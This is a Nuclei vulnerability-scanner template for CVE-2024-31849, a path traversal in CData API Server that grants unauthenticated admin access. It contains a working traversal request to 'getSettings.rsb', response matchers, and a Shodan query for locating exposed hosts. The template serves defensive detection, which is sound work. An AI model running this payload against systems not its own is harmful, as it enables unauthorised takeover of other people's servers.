nuclei-templates/http/cves/2024/CVE-2024-31849.yaml

49 lines
1.2 KiB
YAML
Raw Normal View History

2024-04-29 07:35:42 +00:00
id: CVE-2024-31849
info:
name: CData - Path Traversal
author: DhiyaneshDK
severity: critical
description: |
A path traversal vulnerability exists in the Java version of CData API Server < 23.4.8844 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application.
reference:
- https://www.tenable.com/security/research/tra-2024-09
- https://www.cdata.com/kb/entries/jetty-cve-0324.rst
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-31849
cwe-id: CWE-22
epss-score: 0.00044
epss-percentile: 0.09652
metadata:
shodan-query: title:"CData"
verified: true
max-request: 1
tags: cve,cve2024,cdata,lfi
http:
- raw:
- |
GET /ui/..\src\getSettings.rsb?@json HTTP/1.1
Host: {{Hostname}}
Referer: {{RootURL}}
matchers-condition: and
matchers:
- type: word
part: header
words:
- 'application/json'
- type: word
part: body
words:
- '"items":'
- ':"true"'
condition: and
- type: status
status:
- 200